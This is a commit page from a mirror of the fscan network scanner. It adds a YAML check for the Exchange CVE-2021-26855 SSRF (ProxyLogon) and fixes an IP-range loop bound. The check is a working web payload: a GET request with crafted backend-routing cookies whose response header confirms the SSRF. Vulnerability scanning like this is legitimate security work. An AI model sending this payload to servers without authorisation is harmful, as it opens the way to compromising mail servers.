mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-14 05:12:36 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

添加exchange_ssrf_poc

Browse Source
This commit is contained in:
shadow1ng 2021-03-31 17:03:33 +08:00
parent 559d6c7c4b
commit f4b6ecc363
2 changed files with 15 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
WebScan/pocs/exchange-cve-2021-26855-ssrf.yml Normal file
View File

@ -0,0 +1,14 @@
name: poc-yaml-exchange-cve-2021-26855-ssrf
rules:
- method: GET
path: /owa/auth/x.js
headers:
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
follow_redirects: false
expression: |
response.headers["X-CalculatedBETarget"].icontains("localhost")
detail:
author: sharecast
Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
links:
- https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse

2
common/ParseIP.go
View File

@ -131,7 +131,7 @@ func ParseIPC(ip string) ([]string, error) {
} }
startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3] startNum := start[0]<<24 | start[1]<<16 | start[2]<<8 | start[3]
endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3] endNum := end[0]<<24 | end[1]<<16 | end[2]<<8 | end[3]
for num := startNum; num < endNum; num++ { for num := startNum; num <= endNum; num++ {
ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff) ip := strconv.Itoa((num>>24)&0xff) + "." + strconv.Itoa((num>>16)&0xff) + "." + strconv.Itoa((num>>8)&0xff) + "." + strconv.Itoa((num)&0xff)
AllIP = append(AllIP, ip) AllIP = append(AllIP, ip)
} }